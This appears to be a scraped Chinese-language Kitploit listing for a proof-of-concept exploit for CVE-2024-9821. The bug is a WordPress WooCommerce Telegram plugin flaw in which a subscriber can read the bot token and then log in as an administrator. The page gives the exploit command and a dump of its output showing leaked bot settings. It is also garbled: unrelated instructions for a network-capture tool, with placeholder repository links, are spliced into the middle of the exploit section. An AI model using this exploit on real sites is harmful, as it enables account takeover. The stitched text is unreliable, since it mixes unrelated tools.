Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-9821 — Bot for Telegram on WooCommerce <= 1.2.4 - 经过身份验证的(订阅者+)Telegram 机器人令牌泄露导致身份验证绕过 | Kitploit
工具/GitHubGitHub/randomrobbiebf/cve-2024-9821
身份验证与授权漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试
GitHubrandomrobbiebf/cve-2024-9821

CVE-2024-9821

Bot for Telegram on WooCommerce <= 1.2.4 - 经过身份验证的(订阅者+)Telegram 机器人令牌泄露导致身份验证绕过

查看仓库
181年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-9821

Bot for Telegram on WooCommerce <= 1.2.4 - Authenticated (Subscriber+) Telegram Bot Token Disclosure to Authentication Bypass

Description

用于WordPress的WooCommerce Telegram机器人插件在所有版本(包括1.2.4)中,由于缺少对'stm_wpcfto_get_settings' AJAX操作的授权检查,容易导致敏感信息泄露。这使得具有订阅者及以上访问权限的经过身份验证的攻击者能够查看Telegram机器人令牌,这是一个用于控制机器人的秘密令牌。由于“使用Telegram登录”功能,该令牌随后可用于登录站点上的任何现有用户(例如管理员),前提是攻击者知道用户名。``` Type: plugin CVSS Score: 8.8 CVE: CVE-2024-9821

* Slug: [bot-for-telegram-on-woocommerce](https://wordpress.org/plugin/bot-for-telegram-on-woocommerce)
* Download Link: [Download bot-for-telegram-on-woocommerce Version 1.2.4](https://downloads.wordpress.org/plugin/bot-for-telegram-on-woocommerce.zip)


POC
---```
python3 CVE-2024-9821.py -u http://kubernetes.docker.internal -un user -p user

它将以pcapng格式保存网络流量,包含流元数据和载荷提取,并支持TCP、UDP、DNS、HTTP、TLS/SSL等协议。

安装

首先,克隆仓库:

git clone https://github.com/example/tool.git
cd tool

然后安装依赖:

pip install -r requirements.txt

用法

基本用法:

python tool.py -i eth0 -o output.pcapng

更多选项,请参见 --help。``` Vulnerability check: http://kubernetes.docker.internal Logged in successfully. { 'bot_settings': { 'fields': { 'bftow_bot_api': { 'label': 'Telegram ' 'Bot Token', 'type': 'text', 'value': '8164783304:Axxxxxxxxxxxxxxxxxxxxxxxxxx'}, 'bftow_bot_name': { 'description': 'Set ' 'if ' 'you ' 'want ' 'user ' 'to ' 'get ' 'back ' 'to ' 'Telegram ' 'after ' 'successful ' 'checkout. ' '(Without ' '"@")', 'label': 'Telegram ' 'Bot Name', 'type': 'text', 'value': 'Superbotman'}, 'bftow_buttons': { 'description': 'Save ' 'BOT ' 'Token ' 'first', 'label': 'Activate ' 'API URL', 'type': 'bftow_webhook_activation', 'value': ''}, 'bftow_google_maps_api_key': { 'description': '<a ' 'href="https://developers.google.com/maps/documentation/geocoding/overview">Provide ' 'Google ' 'Maps ' 'API ' 'key ' 'with ' 'enabled ' 'geocoding ' 'API ' 'and ' 'configured ' 'billing ' 'account. ' 'If ' 'you ' 'leave ' 'this ' 'field ' 'empty, ' 'the ' 'location ' 'will ' 'be ' 'taken ' 'via ' 'openstreetmap', 'label': 'Google ' 'Maps ' 'API ' 'key', 'pro': True, 'type': 'text', 'value': ''}, 'bftow_proxy_server': { 'label': 'Proxy ' 'server', 'type': 'text', 'value': 'https://api.telegram.org/bot'}}, 'name': 'BOT API Settings'}, 'interface_settings': { 'fields': { 'bftow_cart_on_site': { 'description': 'if ' 'enabled ' 'and ' 'the ' 'checkout ' 'occurs '

下载工具